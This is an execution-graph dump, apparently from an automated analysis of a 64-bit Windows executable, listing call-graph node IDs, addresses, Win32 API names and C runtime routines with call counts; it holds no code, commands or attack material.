7ff7b2b6869c 16411->16412 16413 7ff7b2b686fa GetTempPathW GetCurrentProcessId 16411->16413 16415 7ff7b2b68830 14 API calls 16412->16415 17324 7ff7b2b625c0 16413->17324 16416 7ff7b2b686a8 16415->16416 17331 7ff7b2b681d0 16416->17331 16422 7ff7b2b68728 __std_exception_copy 16429 7ff7b2b68765 __std_exception_copy 16422->16429 17328 7ff7b2b78b68 16422->17328 16428 7ff7b2b6c550 _log10_special 8 API calls 16430 7ff7b2b63cbb 16428->16430 16434 7ff7b2b69390 2 API calls 16429->16434 16442 7ff7b2b687d4 __std_exception_copy 16429->16442 16430->16178 16430->16190 16435 7ff7b2b687b1 16434->16435 16436 7ff7b2b687e9 16435->16436 16437 7ff7b2b687b6 16435->16437 16442->16428 16444 7ff7b2b693b2 MultiByteToWideChar 16443->16444 16445 7ff7b2b693d6 16443->16445 16444->16445 16447 7ff7b2b693ec __std_exception_copy 16444->16447 16446 7ff7b2b693f3 MultiByteToWideChar 16445->16446 16445->16447 16446->16447 16447->16189 16460 7ff7b2b633ce __scrt_get_show_window_mode 16448->16460 16449 7ff7b2b6c550 _log10_special 8 API calls 16450 7ff7b2b63664 16449->16450 16450->16161 16467 7ff7b2b690c0 LocalFree 16450->16467 16451 7ff7b2b635c7 16451->16449 16453 7ff7b2b61c80 49 API calls 16453->16460 16454 7ff7b2b635e2 16456 7ff7b2b62710 54 API calls 16454->16456 16456->16451 16459 7ff7b2b635c9 16462 7ff7b2b62710 54 API calls 16459->16462 16460->16451 16460->16453 16460->16454 16460->16459 16461 7ff7b2b62a50 54 API calls 16460->16461 16465 7ff7b2b635d0 16460->16465 17602 7ff7b2b64560 16460->17602 17608 7ff7b2b67e20 16460->17608 17619 7ff7b2b61600 16460->17619 17667 7ff7b2b67120 16460->17667 17671 7ff7b2b64190 16460->17671 17715 7ff7b2b64450 16460->17715 16461->16460 16462->16451 16466 7ff7b2b62710 54 API calls 16465->16466 16466->16451 16469 7ff7b2b61ca5 16468->16469 16470 7ff7b2b74984 49 API calls 16469->16470 16471 7ff7b2b61cc8 16470->16471 16471->16127 16473 7ff7b2b69390 2 API calls 16472->16473 16474 7ff7b2b689b4 16473->16474 16475 7ff7b2b78238 38 API calls 16474->16475 16476 7ff7b2b689c6 
__std_exception_copy 16475->16476 16476->16140 16478 7ff7b2b645cc 16477->16478 16479 7ff7b2b69390 2 API calls 16478->16479 16480 7ff7b2b645f4 16479->16480 16481 7ff7b2b69390 2 API calls 16480->16481 16482 7ff7b2b64607 16481->16482 17898 7ff7b2b75f94 16482->17898 16485 7ff7b2b6c550 _log10_special 8 API calls 16486 7ff7b2b6392b 16485->16486 16486->16130 16487 7ff7b2b67f90 16486->16487 16488 7ff7b2b67fb4 16487->16488 16489 7ff7b2b706d4 73 API calls 16488->16489 16492 7ff7b2b6808b __std_exception_copy 16488->16492 16490 7ff7b2b67fd0 16489->16490 16490->16492 18289 7ff7b2b778c8 16490->18289 16492->16134 16493 7ff7b2b706d4 73 API calls 16495 7ff7b2b67fe5 16493->16495 16494 7ff7b2b7039c _fread_nolock 53 API calls 16494->16495 16495->16492 16495->16493 16495->16494 16497 7ff7b2b7007c 16496->16497 18304 7ff7b2b6fe28 16497->18304 16499 7ff7b2b70095 16499->16130 16501 7ff7b2b6c850 16500->16501 16502 7ff7b2b62734 GetCurrentProcessId 16501->16502 16503 7ff7b2b61c80 49 API calls 16502->16503 16504 7ff7b2b62787 16503->16504 16505 7ff7b2b74984 49 API calls 16504->16505 16506 7ff7b2b627cf 16505->16506 16507 7ff7b2b62620 12 API calls 16506->16507 16508 7ff7b2b627f1 16507->16508 16509 7ff7b2b6c550 _log10_special 8 API calls 16508->16509 16510 7ff7b2b62801 16509->16510 16510->16161 16512 7ff7b2b61c80 49 API calls 16511->16512 16513 7ff7b2b644fd 16512->16513 16513->16172 16515 7ff7b2b61c80 49 API calls 16514->16515 16516 7ff7b2b64660 16515->16516 16516->16190 16518 7ff7b2b66dd5 16517->16518 16519 7ff7b2b63e6c 16518->16519 16520 7ff7b2b74f08 _get_daylight 11 API calls 16518->16520 16523 7ff7b2b67340 16519->16523 16521 7ff7b2b66de2 16520->16521 16522 7ff7b2b62910 54 API calls 16521->16522 16522->16519 18315 7ff7b2b61470 16523->18315 18421 7ff7b2b66360 16591->18421 16599 7ff7b2b63399 16611 7ff7b2b7546c EnterCriticalSection 16604->16611 16613 7ff7b2b636bc GetModuleFileNameW 16612->16613 16613->16304 16613->16305 16615 7ff7b2b692d2 16614->16615 16616 7ff7b2b692bf FindClose 16614->16616 
16617 7ff7b2b6c550 _log10_special 8 API calls 16615->16617 16616->16615 16618 7ff7b2b6371a 16617->16618 16618->16310 16618->16311 16620 7ff7b2b6c850 16619->16620 16621 7ff7b2b62c70 GetCurrentProcessId 16620->16621 16650 7ff7b2b626b0 16621->16650 16623 7ff7b2b62cb9 16654 7ff7b2b74bd8 16623->16654 16626 7ff7b2b626b0 48 API calls 16627 7ff7b2b62d34 FormatMessageW 16626->16627 16629 7ff7b2b62d6d 16627->16629 16630 7ff7b2b62d7f MessageBoxW 16627->16630 16631 7ff7b2b626b0 48 API calls 16629->16631 16632 7ff7b2b6c550 _log10_special 8 API calls 16630->16632 16631->16630 16633 7ff7b2b62daf 16632->16633 16633->16308 16635 7ff7b2b69340 GetFinalPathNameByHandleW CloseHandle 16634->16635 16636 7ff7b2b63730 16634->16636 16635->16636 16636->16318 16636->16319 16638 7ff7b2b62834 16637->16638 16639 7ff7b2b626b0 48 API calls 16638->16639 16640 7ff7b2b62887 16639->16640 16641 7ff7b2b74bd8 48 API calls 16640->16641 16642 7ff7b2b628d0 MessageBoxW 16641->16642 16643 7ff7b2b6c550 _log10_special 8 API calls 16642->16643 16644 7ff7b2b62900 16643->16644 16644->16308 16646 7ff7b2b6946a WideCharToMultiByte 16645->16646 16649 7ff7b2b69495 16645->16649 16648 7ff7b2b694ab __std_exception_copy 16646->16648 16646->16649 16647 7ff7b2b694b2 WideCharToMultiByte 16647->16648 16648->16315 16649->16647 16649->16648 16651 7ff7b2b626d5 16650->16651 16652 7ff7b2b74bd8 48 API calls 16651->16652 16653 7ff7b2b626f8 16652->16653 16653->16623 16657 7ff7b2b74c32 16654->16657 16655 7ff7b2b74c57 16656 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 16655->16656 16660 7ff7b2b74c81 16656->16660 16657->16655 16658 7ff7b2b74c93 16657->16658 16672 7ff7b2b72f90 16658->16672 16663 7ff7b2b6c550 _log10_special 8 API calls 16660->16663 16661 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16661->16660 16662 7ff7b2b74d40 16666 7ff7b2b74d74 16662->16666 16667 7ff7b2b74d49 16662->16667 16665 7ff7b2b62d04 16663->16665 16665->16626 16666->16661 16670 7ff7b2b7a948 
Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16667->16670 16668 7ff7b2b74d9a 16668->16666 16669 7ff7b2b74da4 16668->16669 16671 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16669->16671 16670->16660 16671->16660 16673 7ff7b2b72fce 16672->16673 16674 7ff7b2b72fbe 16672->16674 16675 7ff7b2b72fd7 16673->16675 16679 7ff7b2b73005 16673->16679 16676 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 16674->16676 16677 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 16675->16677 16678 7ff7b2b72ffd 16676->16678 16677->16678 16678->16662 16678->16666 16678->16667 16678->16668 16679->16674 16679->16678 16683 7ff7b2b739a4 16679->16683 16716 7ff7b2b733f0 16679->16716 16753 7ff7b2b72b80 16679->16753 16684 7ff7b2b73a57 16683->16684 16685 7ff7b2b739e6 16683->16685 16688 7ff7b2b73a5c 16684->16688 16689 7ff7b2b73ab0 16684->16689 16686 7ff7b2b739ec 16685->16686 16687 7ff7b2b73a81 16685->16687 16690 7ff7b2b739f1 16686->16690 16691 7ff7b2b73a20 16686->16691 16776 7ff7b2b71d54 16687->16776 16692 7ff7b2b73a5e 16688->16692 16693 7ff7b2b73a91 16688->16693 16695 7ff7b2b73aba 16689->16695 16696 7ff7b2b73ac7 16689->16696 16700 7ff7b2b73abf 16689->16700 16690->16696 16698 7ff7b2b739f7 16690->16698 16691->16698 16691->16700 16694 7ff7b2b73a00 16692->16694 16703 7ff7b2b73a6d 16692->16703 16783 7ff7b2b71944 16693->16783 16715 7ff7b2b73af0 16694->16715 16756 7ff7b2b74158 16694->16756 16695->16687 16695->16700 16790 7ff7b2b746ac 16696->16790 16698->16694 16704 7ff7b2b73a32 16698->16704 16713 7ff7b2b73a1b 16698->16713 16700->16715 16794 7ff7b2b72164 16700->16794 16703->16687 16706 7ff7b2b73a72 16703->16706 16704->16715 16766 7ff7b2b74494 16704->16766 16706->16715 16772 7ff7b2b74558 16706->16772 16708 7ff7b2b6c550 _log10_special 8 API calls 16710 7ff7b2b73dea 16708->16710 16710->16679 16714 7ff7b2b73cdc 16713->16714 16713->16715 16801 7ff7b2b747c0 16713->16801 16714->16715 16807 7ff7b2b7ea08 16714->16807 16715->16708 16717 7ff7b2b733fe 16716->16717 
16718 7ff7b2b73414 16716->16718 16720 7ff7b2b73a57 16717->16720 16721 7ff7b2b739e6 16717->16721 16741 7ff7b2b73454 16717->16741 16719 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 16718->16719 16718->16741 16719->16741 16724 7ff7b2b73a5c 16720->16724 16725 7ff7b2b73ab0 16720->16725 16722 7ff7b2b739ec 16721->16722 16723 7ff7b2b73a81 16721->16723 16726 7ff7b2b739f1 16722->16726 16727 7ff7b2b73a20 16722->16727 16733 7ff7b2b71d54 38 API calls 16723->16733 16728 7ff7b2b73a5e 16724->16728 16729 7ff7b2b73a91 16724->16729 16731 7ff7b2b73aba 16725->16731 16732 7ff7b2b73ac7 16725->16732 16736 7ff7b2b73abf 16725->16736 16726->16732 16734 7ff7b2b739f7 16726->16734 16727->16734 16727->16736 16730 7ff7b2b73a00 16728->16730 16742 7ff7b2b73a6d 16728->16742 16738 7ff7b2b71944 38 API calls 16729->16738 16735 7ff7b2b74158 47 API calls 16730->16735 16752 7ff7b2b73af0 16730->16752 16731->16723 16731->16736 16737 7ff7b2b746ac 45 API calls 16732->16737 16750 7ff7b2b73a1b 16733->16750 16734->16730 16739 7ff7b2b73a32 16734->16739 16734->16750 16735->16750 16740 7ff7b2b72164 38 API calls 16736->16740 16736->16752 16737->16750 16738->16750 16743 7ff7b2b74494 46 API calls 16739->16743 16739->16752 16740->16750 16741->16679 16742->16723 16744 7ff7b2b73a72 16742->16744 16743->16750 16746 7ff7b2b74558 37 API calls 16744->16746 16744->16752 16745 7ff7b2b6c550 _log10_special 8 API calls 16747 7ff7b2b73dea 16745->16747 16746->16750 16747->16679 16748 7ff7b2b747c0 45 API calls 16751 7ff7b2b73cdc 16748->16751 16749 7ff7b2b7ea08 46 API calls 16749->16751 16750->16748 16750->16751 16750->16752 16751->16749 16751->16752 16752->16745 17030 7ff7b2b70fc8 16753->17030 16757 7ff7b2b7417e 16756->16757 16819 7ff7b2b70b80 16757->16819 16762 7ff7b2b742c3 16764 7ff7b2b747c0 45 API calls 16762->16764 16765 7ff7b2b74351 16762->16765 16763 7ff7b2b747c0 45 API calls 16763->16762 16764->16765 16765->16713 16767 7ff7b2b744c9 16766->16767 16768 7ff7b2b744e7 16767->16768 16769 7ff7b2b7450e 16767->16769 16770 
7ff7b2b747c0 45 API calls 16767->16770 16771 7ff7b2b7ea08 46 API calls 16768->16771 16769->16713 16770->16768 16771->16769 16774 7ff7b2b74579 16772->16774 16773 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 16775 7ff7b2b745aa 16773->16775 16774->16773 16774->16775 16775->16713 16777 7ff7b2b71d87 16776->16777 16778 7ff7b2b71db6 16777->16778 16780 7ff7b2b71e73 16777->16780 16782 7ff7b2b71df3 16778->16782 16962 7ff7b2b70c28 16778->16962 16781 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 16780->16781 16781->16782 16782->16713 16784 7ff7b2b71977 16783->16784 16785 7ff7b2b719a6 16784->16785 16787 7ff7b2b71a63 16784->16787 16786 7ff7b2b70c28 12 API calls 16785->16786 16789 7ff7b2b719e3 16785->16789 16786->16789 16788 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 16787->16788 16788->16789 16789->16713 16791 7ff7b2b746ef 16790->16791 16793 7ff7b2b746f3 __crtLCMapStringW 16791->16793 16970 7ff7b2b74748 16791->16970 16793->16713 16795 7ff7b2b72197 16794->16795 16796 7ff7b2b721c6 16795->16796 16798 7ff7b2b72283 16795->16798 16797 7ff7b2b70c28 12 API calls 16796->16797 16800 7ff7b2b72203 16796->16800 16797->16800 16799 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 16798->16799 16799->16800 16800->16713 16802 7ff7b2b747d7 16801->16802 16974 7ff7b2b7d9b8 16802->16974 16809 7ff7b2b7ea39 16807->16809 16816 7ff7b2b7ea47 16807->16816 16808 7ff7b2b7ea67 16811 7ff7b2b7ea78 16808->16811 16812 7ff7b2b7ea9f 16808->16812 16809->16808 16810 7ff7b2b747c0 45 API calls 16809->16810 16809->16816 16810->16808 17020 7ff7b2b800a0 16811->17020 16814 7ff7b2b7eb2a 16812->16814 16815 7ff7b2b7eac9 16812->16815 16812->16816 16817 7ff7b2b7f8a0 _fread_nolock MultiByteToWideChar 16814->16817 16815->16816 17023 7ff7b2b7f8a0 16815->17023 16816->16714 16817->16816 16820 7ff7b2b70bb7 16819->16820 16821 7ff7b2b70ba6 16819->16821 16820->16821 16849 7ff7b2b7d5fc 16820->16849 16827 7ff7b2b7e570 16821->16827 16824 7ff7b2b70bf8 16826 7ff7b2b7a948 
Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16824->16826 16825 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16825->16824 16826->16821 16828 7ff7b2b7e58d 16827->16828 16829 7ff7b2b7e5c0 16827->16829 16830 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 16828->16830 16829->16828 16831 7ff7b2b7e5f2 16829->16831 16839 7ff7b2b742a1 16830->16839 16832 7ff7b2b7e705 16831->16832 16844 7ff7b2b7e63a 16831->16844 16833 7ff7b2b7e7f7 16832->16833 16835 7ff7b2b7e7bd 16832->16835 16837 7ff7b2b7e78c 16832->16837 16838 7ff7b2b7e74f 16832->16838 16841 7ff7b2b7e745 16832->16841 16889 7ff7b2b7da5c 16833->16889 16882 7ff7b2b7ddf4 16835->16882 16875 7ff7b2b7e0d4 16837->16875 16865 7ff7b2b7e304 16838->16865 16839->16762 16839->16763 16841->16835 16843 7ff7b2b7e74a 16841->16843 16843->16837 16843->16838 16844->16839 16856 7ff7b2b7a4a4 16844->16856 16847 7ff7b2b7a900 _isindst 17 API calls 16848 7ff7b2b7e854 16847->16848 16850 7ff7b2b7d647 16849->16850 16854 7ff7b2b7d60b _get_daylight 16849->16854 16851 7ff7b2b74f08 _get_daylight 11 API calls 16850->16851 16853 7ff7b2b70be4 16851->16853 16852 7ff7b2b7d62e HeapAlloc 16852->16853 16852->16854 16853->16824 16853->16825 16854->16850 16854->16852 16855 7ff7b2b83590 _get_daylight 2 API calls 16854->16855 16855->16854 16857 7ff7b2b7a4b1 16856->16857 16859 7ff7b2b7a4bb 16856->16859 16857->16859 16863 7ff7b2b7a4d6 16857->16863 16858 7ff7b2b74f08 _get_daylight 11 API calls 16860 7ff7b2b7a4c2 16858->16860 16859->16858 16861 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 16860->16861 16862 7ff7b2b7a4ce 16861->16862 16862->16839 16862->16847 16863->16862 16864 7ff7b2b74f08 _get_daylight 11 API calls 16863->16864 16864->16860 16898 7ff7b2b840ac 16865->16898 16869 7ff7b2b7e3ac 16870 7ff7b2b7e401 16869->16870 16872 7ff7b2b7e3cc 16869->16872 16874 7ff7b2b7e3b0 16869->16874 16951 7ff7b2b7def0 16870->16951 16947 7ff7b2b7e1ac 16872->16947 16874->16839 16876 7ff7b2b840ac 38 API calls 16875->16876 16877 
Execution Graph

The rendered execution graph (call/control-flow graph of the submitted executable) cannot be reproduced in text form; the flattened node/edge list exported from the graph image has been omitted here. Information recoverable from the graph labels:

Address range of graph nodes: 7ff7b2b61xxx to 7ff7b2b88xxx (64-bit image mapping).

Win32 API nodes named in the graph: GetTokenInformation, ConvertSidToStringSidW, GetLastError, SetLastError, CloseHandle, GetCurrentProcessId, MessageBoxA, MessageBoxW, FlsGetValue, FlsSetValue, EnterCriticalSection, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, CreateDirectoryW, GetOEMCP.

C runtime symbols named in the graph: _invalid_parameter_noinfo, __scrt_get_show_window_mode, __std_exception_copy, __CxxCallCatchBlock, _get_daylight, _isindst, _fread_nolock, memcpy_s, fegetenv, _log10_special, __crtLCMapStringW, Concurrency::details::SchedulerProxy::DeleteThis.

Aggregated nodes carry an "N API calls" annotation (values seen: 2, 3, 5, 8, 10, 11, 12, 14, 17, 20, 37, 38, 40, 45, 46, 47, 48, 49, 50, 51, 54, 65, 73, 74, 108 API calls).
19149->19151 19152 7ff7b2b81ffb GetACP 19149->19152 19150->19151 19151->19113 19151->19117 19152->19151 19154 7ff7b2b81fc4 47 API calls 19153->19154 19155 7ff7b2b82699 19154->19155 19156 7ff7b2b827ef 19155->19156 19158 7ff7b2b826d6 IsValidCodePage 19155->19158 19163 7ff7b2b826f0 __scrt_get_show_window_mode 19155->19163 19157 7ff7b2b6c550 _log10_special 8 API calls 19156->19157 19159 7ff7b2b82431 19157->19159 19158->19156 19160 7ff7b2b826e7 19158->19160 19159->19121 19159->19126 19161 7ff7b2b82716 GetCPInfo 19160->19161 19160->19163 19161->19156 19161->19163 19180 7ff7b2b820dc 19163->19180 19246 7ff7b2b802d8 EnterCriticalSection 19164->19246 19181 7ff7b2b82119 GetCPInfo 19180->19181 19182 7ff7b2b8220f 19180->19182 19181->19182 19188 7ff7b2b8212c 19181->19188 19183 7ff7b2b6c550 _log10_special 8 API calls 19182->19183 19185 7ff7b2b822ae 19183->19185 19184 7ff7b2b82e40 48 API calls 19186 7ff7b2b821a3 19184->19186 19185->19156 19191 7ff7b2b87b84 19186->19191 19188->19184 19190 7ff7b2b87b84 54 API calls 19190->19182 19192 7ff7b2b74f4c 45 API calls 19191->19192 19193 7ff7b2b87ba9 19192->19193 19196 7ff7b2b87850 19193->19196 19197 7ff7b2b87891 19196->19197 19198 7ff7b2b7f8a0 _fread_nolock MultiByteToWideChar 19197->19198 19201 7ff7b2b878db 19198->19201 19199 7ff7b2b87b59 19200 7ff7b2b6c550 _log10_special 8 API calls 19199->19200 19202 7ff7b2b821d6 19200->19202 19201->19199 19203 7ff7b2b7d5fc _fread_nolock 12 API calls 19201->19203 19205 7ff7b2b87913 19201->19205 19215 7ff7b2b87a11 19201->19215 19202->19190 19203->19205 19204 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19204->19199 19206 7ff7b2b7f8a0 _fread_nolock MultiByteToWideChar 19205->19206 19205->19215 19207 7ff7b2b87986 19206->19207 19207->19215 19227 7ff7b2b7f0e4 19207->19227 19210 7ff7b2b87a22 19212 7ff7b2b87af4 19210->19212 19213 7ff7b2b7d5fc _fread_nolock 12 API calls 19210->19213 19217 7ff7b2b87a40 19210->19217 19211 7ff7b2b879d1 19214 7ff7b2b7f0e4 __crtLCMapStringW 6 API calls 
19211->19214 19211->19215 19212->19215 19216 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19212->19216 19213->19217 19214->19215 19215->19199 19215->19204 19216->19215 19217->19215 19218 7ff7b2b7f0e4 __crtLCMapStringW 6 API calls 19217->19218 19219 7ff7b2b87ac0 19218->19219 19219->19212 19220 7ff7b2b87af6 19219->19220 19221 7ff7b2b87ae0 19219->19221 19223 7ff7b2b807e8 WideCharToMultiByte 19220->19223 19222 7ff7b2b807e8 WideCharToMultiByte 19221->19222 19224 7ff7b2b87aee 19222->19224 19223->19224 19224->19212 19225 7ff7b2b87b0e 19224->19225 19225->19215 19226 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19225->19226 19226->19215 19233 7ff7b2b7ed10 19227->19233 19230 7ff7b2b7f12a 19230->19210 19230->19211 19230->19215 19232 7ff7b2b7f193 LCMapStringW 19232->19230 19234 7ff7b2b7ed6d 19233->19234 19236 7ff7b2b7ed68 __vcrt_FlsAlloc 19233->19236 19234->19230 19243 7ff7b2b7f1d0 19234->19243 19235 7ff7b2b7ed9d LoadLibraryExW 19238 7ff7b2b7ee72 19235->19238 19239 7ff7b2b7edc2 GetLastError 19235->19239 19236->19234 19236->19235 19237 7ff7b2b7ee92 GetProcAddress 19236->19237 19242 7ff7b2b7edfc LoadLibraryExW 19236->19242 19237->19234 19241 7ff7b2b7eea3 19237->19241 19238->19237 19240 7ff7b2b7ee89 FreeLibrary 19238->19240 19239->19236 19240->19237 19241->19234 19242->19236 19242->19238 19244 7ff7b2b7ed10 __crtLCMapStringW 5 API calls 19243->19244 19245 7ff7b2b7f1fe __crtLCMapStringW 19244->19245 19245->19232 19248 7ff7b2b794ad 19247->19248 19249 7ff7b2b79349 19247->19249 19250 7ff7b2b794d6 19248->19250 19251 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19248->19251 19249->19084 19252 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19250->19252 19251->19248 19252->19249 19254 7ff7b2b862d8 19253->19254 19255 7ff7b2b862c1 19253->19255 19254->19255 19258 7ff7b2b862e6 19254->19258 19256 7ff7b2b74f08 _get_daylight 11 API calls 19255->19256 19257 7ff7b2b862c6 
19256->19257 19259 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 19257->19259 19260 7ff7b2b862d1 19258->19260 19261 7ff7b2b74f4c 45 API calls 19258->19261 19259->19260 19260->18922 19261->19260 19263 7ff7b2b74f4c 45 API calls 19262->19263 19264 7ff7b2b88f71 19263->19264 19267 7ff7b2b88bc8 19264->19267 19269 7ff7b2b88c16 19267->19269 19268 7ff7b2b6c550 _log10_special 8 API calls 19270 7ff7b2b87205 19268->19270 19271 7ff7b2b88c9d 19269->19271 19273 7ff7b2b88c88 GetCPInfo 19269->19273 19294 7ff7b2b88ca1 19269->19294 19270->18922 19270->18946 19272 7ff7b2b7f8a0 _fread_nolock MultiByteToWideChar 19271->19272 19271->19294 19274 7ff7b2b88d35 19272->19274 19273->19271 19273->19294 19275 7ff7b2b7d5fc _fread_nolock 12 API calls 19274->19275 19276 7ff7b2b88d6c 19274->19276 19274->19294 19275->19276 19277 7ff7b2b7f8a0 _fread_nolock MultiByteToWideChar 19276->19277 19276->19294 19278 7ff7b2b88dda 19277->19278 19279 7ff7b2b88ebc 19278->19279 19280 7ff7b2b7f8a0 _fread_nolock MultiByteToWideChar 19278->19280 19281 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19279->19281 19279->19294 19282 7ff7b2b88e00 19280->19282 19281->19294 19282->19279 19283 7ff7b2b7d5fc _fread_nolock 12 API calls 19282->19283 19284 7ff7b2b88e2d 19282->19284 19283->19284 19284->19279 19285 7ff7b2b7f8a0 _fread_nolock MultiByteToWideChar 19284->19285 19286 7ff7b2b88ea4 19285->19286 19287 7ff7b2b88ec4 19286->19287 19288 7ff7b2b88eaa 19286->19288 19296 7ff7b2b7ef68 19287->19296 19288->19279 19291 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19288->19291 19291->19279 19292 7ff7b2b88f03 19292->19294 19295 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19292->19295 19293 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19293->19292 19294->19268 19295->19294 19297 7ff7b2b7ed10 __crtLCMapStringW 5 API calls 19296->19297 19298 7ff7b2b7efa6 19297->19298 19299 7ff7b2b7efae 19298->19299 19300 
7ff7b2b7f1d0 __crtLCMapStringW 5 API calls 19298->19300 19299->19292 19299->19293 19301 7ff7b2b7f017 CompareStringW 19300->19301 19301->19299 19303 7ff7b2b87c5a HeapSize 19302->19303 19304 7ff7b2b87c41 19302->19304 19305 7ff7b2b74f08 _get_daylight 11 API calls 19304->19305 19306 7ff7b2b87c46 19305->19306 19307 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 19306->19307 19308 7ff7b2b87c51 19307->19308 19308->18951 19310 7ff7b2b87c89 19309->19310 19311 7ff7b2b87c93 19309->19311 19312 7ff7b2b7d5fc _fread_nolock 12 API calls 19310->19312 19313 7ff7b2b87c98 19311->19313 19319 7ff7b2b87c9f _get_daylight 19311->19319 19317 7ff7b2b87c91 19312->19317 19314 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19313->19314 19314->19317 19315 7ff7b2b87ca5 19318 7ff7b2b74f08 _get_daylight 11 API calls 19315->19318 19316 7ff7b2b87cd2 HeapReAlloc 19316->19317 19316->19319 19317->18955 19318->19317 19319->19315 19319->19316 19320 7ff7b2b83590 _get_daylight 2 API calls 19319->19320 19320->19319 19322 7ff7b2b7ed10 __crtLCMapStringW 5 API calls 19321->19322 19323 7ff7b2b7ef44 19322->19323 19323->18959 19325 7ff7b2b754fa 19324->19325 19326 7ff7b2b754d6 19324->19326 19327 7ff7b2b75554 19325->19327 19328 7ff7b2b754ff 19325->19328 19330 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19326->19330 19333 7ff7b2b754e5 19326->19333 19329 7ff7b2b7f8a0 _fread_nolock MultiByteToWideChar 19327->19329 19331 7ff7b2b75514 19328->19331 19328->19333 19334 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19328->19334 19340 7ff7b2b75570 19329->19340 19330->19333 19335 7ff7b2b7d5fc _fread_nolock 12 API calls 19331->19335 19332 7ff7b2b75577 GetLastError 19336 7ff7b2b74e7c _fread_nolock 11 API calls 19332->19336 19333->18963 19333->18964 19334->19331 19335->19333 19339 7ff7b2b75584 19336->19339 19337 7ff7b2b755b2 19337->19333 19338 7ff7b2b7f8a0 _fread_nolock MultiByteToWideChar 19337->19338 19342 7ff7b2b755f6 19338->19342 
19343 7ff7b2b74f08 _get_daylight 11 API calls 19339->19343 19340->19332 19340->19337 19341 7ff7b2b755a5 19340->19341 19344 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19340->19344 19345 7ff7b2b7d5fc _fread_nolock 12 API calls 19341->19345 19342->19332 19342->19333 19343->19333 19344->19341 19345->19337 19347 7ff7b2b79225 19346->19347 19348 7ff7b2b79221 19346->19348 19367 7ff7b2b82a3c GetEnvironmentStringsW 19347->19367 19348->18992 19359 7ff7b2b795cc 19348->19359 19351 7ff7b2b7923e 19374 7ff7b2b7938c 19351->19374 19352 7ff7b2b79232 19353 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19352->19353 19353->19348 19356 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19357 7ff7b2b79265 19356->19357 19358 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19357->19358 19358->19348 19360 7ff7b2b795ef 19359->19360 19363 7ff7b2b79606 19359->19363 19360->18992 19361 7ff7b2b7f8a0 MultiByteToWideChar _fread_nolock 19361->19363 19362 7ff7b2b7eb98 _get_daylight 11 API calls 19362->19363 19363->19360 19363->19361 19363->19362 19364 7ff7b2b7967a 19363->19364 19366 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19363->19366 19365 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19364->19365 19365->19360 19366->19363 19368 7ff7b2b7922a 19367->19368 19371 7ff7b2b82a60 19367->19371 19368->19351 19368->19352 19369 7ff7b2b7d5fc _fread_nolock 12 API calls 19370 7ff7b2b82a97 memcpy_s 19369->19370 19372 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19370->19372 19371->19369 19373 7ff7b2b82ab7 FreeEnvironmentStringsW 19372->19373 19373->19368 19375 7ff7b2b793b4 19374->19375 19376 7ff7b2b7eb98 _get_daylight 11 API calls 19375->19376 19387 7ff7b2b793ef 19376->19387 19377 7ff7b2b793f7 19378 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19377->19378 19379 7ff7b2b79246 
19378->19379 19379->19356 19380 7ff7b2b79471 19381 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19380->19381 19381->19379 19382 7ff7b2b7eb98 _get_daylight 11 API calls 19382->19387 19383 7ff7b2b79460 19384 7ff7b2b794a8 11 API calls 19383->19384 19386 7ff7b2b79468 19384->19386 19385 7ff7b2b80474 37 API calls 19385->19387 19389 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19386->19389 19387->19377 19387->19380 19387->19382 19387->19383 19387->19385 19388 7ff7b2b79494 19387->19388 19390 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19387->19390 19391 7ff7b2b7a900 _isindst 17 API calls 19388->19391 19389->19377 19390->19387 19392 7ff7b2b794a6 19391->19392 19394 7ff7b2b88b31 __crtLCMapStringW 19393->19394 19395 7ff7b2b870ee 19394->19395 19396 7ff7b2b7ef68 6 API calls 19394->19396 19395->19018 